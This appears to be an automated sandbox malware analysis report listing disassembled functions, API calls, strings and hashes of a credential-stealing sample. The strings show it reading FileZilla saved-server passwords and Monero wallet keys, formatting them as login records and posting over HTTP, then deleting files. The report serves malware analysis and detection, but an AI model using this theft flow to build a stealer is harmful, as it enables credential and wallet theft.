                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8251e9103386f6c0f906bfb03d9dd32a1afeef8780a9a251416f335c71d539ae
                                    • Instruction ID: 924518d98cf74d25a056b55ae1fb8226a8f281c16d93c3887b75654f644d7151
                                    • Opcode Fuzzy Hash: 8251e9103386f6c0f906bfb03d9dd32a1afeef8780a9a251416f335c71d539ae
                                    • Instruction Fuzzy Hash: 885148B3E046208BE354AE28DC853A7F795EB44320F2B463DDE9857780D93A5C1487C6
                                    Function 00206799 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 6ed4f9ea0d2615a361e419aa15179b8c40e89e8b327a560db8f23c90dfd52735
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 42516962E19BD985C7058F7944502EEBFB21FE6200F2E829EC4981B3C3C2759699C3E5
                                    Function 006923FE Relevance: .1, Instructions: 111COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf833a3c415f313c0e90d3abe1db9af196622bc72ce38e1659362fc672a311e6
                                    • Instruction ID: 1b4ca807f63da42af8b9cfa983886534e0281b6e8e426886dc5ac129e39ce39b
                                    • Opcode Fuzzy Hash: bf833a3c415f313c0e90d3abe1db9af196622bc72ce38e1659362fc672a311e6
                                    • Instruction Fuzzy Hash: 7D3106F240C602EBDB08BF28DC6473AB7EABB54710F26853DDAC347A44E93555129687
                                    Function 001D7588 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                    • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Function 001A9AA0 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 001A03B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,001B0DBF,001B0DBE,001B0DBB,001B0DBA), ref: 001A04C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A04C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 001A04E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A04F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 001A052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 001A0579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001A05C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A05D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A0692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A06AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001A06C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 001A06D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 001A06E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A06F3
                                    • lstrcat.KERNEL32(?,001B1770), ref: 001A0702
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0715
                                    • lstrcat.KERNEL32(?,001B1774), ref: 001A0724
                                    • lstrcat.KERNEL32(?,login: ), ref: 001A0733
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0746
                                    • lstrcat.KERNEL32(?,001B1780), ref: 001A0755
                                    • lstrcat.KERNEL32(?,password: ), ref: 001A0764
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A0777
                                    • lstrcat.KERNEL32(?,001B1790), ref: 001A0786
                                    • lstrcat.KERNEL32(?,001B1794), ref: 001A0795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001B0DB7), ref: 001A07EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 5f45f72b1a0315ed598bd037d1f4b9309f046dba6217440e7be5c63296f5bad4
                                    • Instruction ID: a6a998dc28f745b4adb40851d032d1eff1e09bc98835a25c611788b38e5b390a
                                    • Opcode Fuzzy Hash: 5f45f72b1a0315ed598bd037d1f4b9309f046dba6217440e7be5c63296f5bad4
                                    • Instruction Fuzzy Hash: 16D14379D10208ABCB44EBF0DD66EEE7739AF29300F908554F102B7195EF74AA44CB65
                                    Function 001959B0 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00195A48
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00195A63
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00195BE3
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E2EB60,00000000,?,00E2AB08,00000000,?,001B1B4C), ref: 00195EC1
                                    • lstrlen.KERNEL32(00000000), ref: 00195ED2
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00195EE3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00195EEA
                                    • lstrlen.KERNEL32(00000000), ref: 00195EFF
                                    • lstrlen.KERNEL32(00000000), ref: 00195F28
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00195F41
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00195F6B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00195F7F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00195F9C
                                    • InternetCloseHandle.WININET(00000000), ref: 00196000
                                    • InternetCloseHandle.WININET(00000000), ref: 0019600D
                                    • HttpOpenRequestA.WININET(00000000,00E2EA50,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 00195C48
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00196017
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------$P$P$`
                                    • API String ID: 874700897-3695623986
                                    • Opcode ID: 83ec64a663779f1c22d37638383dd91627d87f2b6128ecc1b423f13a280e7b9b
                                    • Instruction ID: 0b3fc10ccd82be2e08af550f02a4ce8ec9fb96ac5c80105987fb87b1a61c4cc2
                                    • Opcode Fuzzy Hash: 83ec64a663779f1c22d37638383dd91627d87f2b6128ecc1b423f13a280e7b9b
                                    • Instruction Fuzzy Hash: 66121E75960118ABCB55EBA0DCA6FEEB379BF25700F8041A9F10663191EF702B48CF65
                                    Function 0019CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D083
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0019D1C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0019D1CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D308
                                    • lstrcat.KERNEL32(?,001B1570), ref: 0019D317
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D32A
                                    • lstrcat.KERNEL32(?,001B1574), ref: 0019D339
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D34C
                                    • lstrcat.KERNEL32(?,001B1578), ref: 0019D35B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D36E
                                    • lstrcat.KERNEL32(?,001B157C), ref: 0019D37D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D390
                                    • lstrcat.KERNEL32(?,001B1580), ref: 0019D39F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D3B2
                                    • lstrcat.KERNEL32(?,001B1584), ref: 0019D3C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019D3D4
                                    • lstrcat.KERNEL32(?,001B1588), ref: 0019D3E3
                                      • Part of subcall function 001AAB30: lstrlen.KERNEL32(00194F55,?,?,00194F55,001B0DDF), ref: 001AAB3B
                                      • Part of subcall function 001AAB30: lstrcpy.KERNEL32(001B0DDF,00000000), ref: 001AAB95
                                    • lstrlen.KERNEL32(?), ref: 0019D42A
                                    • lstrlen.KERNEL32(?), ref: 0019D439
                                      • Part of subcall function 001AAD80: StrCmpCA.SHLWAPI(00000000,001B1568,0019D2A2,001B1568,00000000), ref: 001AAD9F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019D4B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: 1a16ab7ddd4a48ccb42331f36b0b380b85a48af2271e8b9f4a8f3b26a5984f88
                                    • Instruction ID: 45c7c2c29f80e01ac4e789efe87dd3228c37d3241f23d2b23073181ed91e6298
